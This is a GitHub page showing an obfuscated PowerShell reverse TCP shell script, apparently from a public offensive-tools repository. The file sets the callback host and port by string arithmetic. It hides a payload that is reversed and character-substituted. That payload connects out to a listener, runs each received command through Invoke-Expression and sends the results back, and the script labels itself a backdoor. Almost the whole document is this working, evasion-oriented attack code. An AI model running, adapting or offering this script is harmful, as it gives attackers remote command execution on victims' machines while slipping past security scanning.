-
Notifications
You must be signed in to change notification settings - Fork 65
/
powershell_reverse_tcp_obfuscated.ps1
73 lines (73 loc) · 2.7 KB
/
powershell_reverse_tcp_obfuscated.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# change the host address and/or port number as necessary
# obfuscated host address, same as $a = "127.0.0.1";
$a = "127" + "." + "0" + "." + "0" + "." + "1";
# obfuscated port number, same as $p = 9000;
$p = 1000 + 1000 + 1000 + 6000;
$kT2r9V = [chAR[ ] ]" ) )93]raHC[,'but'ecALpERc-69]raHC[,'SWT'eCAlpeR-63]raHC[,)76]raHC[+87]raHC[+09]raHC[( ecALpERc- 43]raHC[,)78]raHC[+56]raHC[+801]raHC[(eCAlpeR-421]raHC[,)211]raHC[+67]raHC[+201]raHC[(eCAlpeR- )'}
;)()butT'+'CEL'+'but + butLOCbut(::]CG[
}
;d )*V-'+'ra* MSWTCSWTGSWT( &
{ )llunCNZ en- dCNZ'+'( fi
}
;r )*V-ra* MSWTCSWTGSWT( &
{ )llunCNZ en- rCNZ( fi
}
;b )*V-ra* MSWTCSWTGSWT( &
;)(raelC.bCNZ
{ )llunCNZ en- bCNZ( fi
}
;c )*V-ra* MSWTCSWTGSWT( &
;)(esopsiD.cCNZ ;)(esolC.cCNZ
{ )llunCNZ en- cCNZ( fi
}
;s )*V-ra* MSWTCSWTGSWT'+'( &
;)(esopsiD.sCNZ ;)(esolC.sCNZ
{'+' )llunCNZ en- sCNZ( fi
}
;w )*V-ra* MSWTCSWTGSWT( &
;)(esopsiD.wCNZ ;)(esolC.wCNZ
{ )llunCNZ en- wCNZ( fi
{ yllanif }
;'+'egasseM.noitpecxErennI.noitpecxE._CNZ )??oH-e* MSWTCSWTGSWT( &
{ hc'+'tac }
;WAl...tixe won lliw roodkcaBWAl )??o'+'H-e* MSWTCSWTGSW'+'T( &
;)0 tg- y'+'bCNZ( elihw }
}
}
}
;r )*V-'+'ra* MSWTCSWTGSWT( &
;)rCNZ(etirW'+'.wCNZ'+'
{ )0 tg- htgneL.rCNZ( fi
;d )*V-ra* MSWTCSWTGSWT( &
}
;)?????S-tu* '+'MSWTCSWTGSWT( & pLf'+' noitpecxE._CNZ = rCNZ
{ hctac }
;)?????S-tu* MSWTCSWTGS'+'WT( & pLf 1&>2 dCNZ dnammoC- )*E-ek* MSWTCSWTGSWT( & = rCNZ
{ yrt
{ )0 tg- htgneL.dCNZ( fi
;)(mirT.dCNZ = dCNZ
{ )0 tg- ybCNZ( fi
;)elbal'+'iavAataD.sCNZ( elihw }
}
;)ybCNZ ,0 '+',bCNZ(gnirtSteG.eCNZ =+ dCNZ
{ )0'+' tg- ybCNZ('+' fi
;)htgneL.bCNZ ,0 ,bCNZ(daeR.sCNZ = ybCNZ
{ od '+'
;)WAl>SPWAl(etirW.wCNZ
{ od
;0 = '+'ybCNZ
;WAlWAl'+' )??oH-e* MSWTCSWTGSWT( &
;WAl...gninnur dna pu si roodkcaBWAl '+')??oH-e* MSW'+'TCSWTGSWT( &
;eurtCNZ = hsulFotuA.wCNZ
;)but)4201 ,8FT'+'U::]gn'+'idocnE.txeT[ ,sCNZ(RSWTESWTTSWTISWTRSWTWSWTMSWTASWTESWTRSWTTSWTSSWT.SWTOSWTISWT )*O-we* MSWTCS'+'WTGSWT( &b'+'ut'+' )*E-ek* MSWTCSWTGSWT( &( = wCNZ
;gnidocnE8FTU.txeT )*O-we* MSWTCSWTGSWT( & = eCNZ
;)21 - '+'21 + 4201('+' ][etyB )*O-we* MSWTCSWTGSWT( & = bCNZ
;)(maertSteG.cCNZ = sCNZ
;)but)pCNZ ,aCNZ(TSWTNSWTESWTISWTLSWTCSWTPSWTCSWTTSWT.SWTSSWTTSWTESWTKSWTCSWTOS'+'WTSSW'+'T.SWTTSWTESWTNSWT )*O-we* M'+'SWTCSWTG'+'SWT( &'+'but )*E-ek* MSWTCSWTGSWT( &( = cCNZ
{'+' yrt
;llunCNZ = rCNZ = dCNZ = wCNZ = bCN'+'Z = sCNZ = cCNZ
;WAl.pct-esrever-llehsrewop/kecnis-navi/moc.buhtig ta yrotisoper buHtiGWAl )??oH-e* MSWTCSWTGSWT( &
;WAl.kecniS navI yb 0.4v PCT esreveR llehSrewoPWAl )??oH-e* MSWTCSW'+'TGSWT( &'((( )''nIOJ-]52,62,4[cepSmoc:vNe$ (. "; [aRRay]::REveRSE((lS ("vARi"+"aBL"+"e:kT2R9v")).valuE) ;&( $sHeLLid[1]+$ShEllID[13]+'X')( -jOIN (lS ("vARi"+"aBL"+"e:kT2R9v")).valuE );
& (`G`C`M *ar-V*) a;
& (`G`C`M *ar-V*) p;
& (`G`C`M *ar-V*) kT2r9V;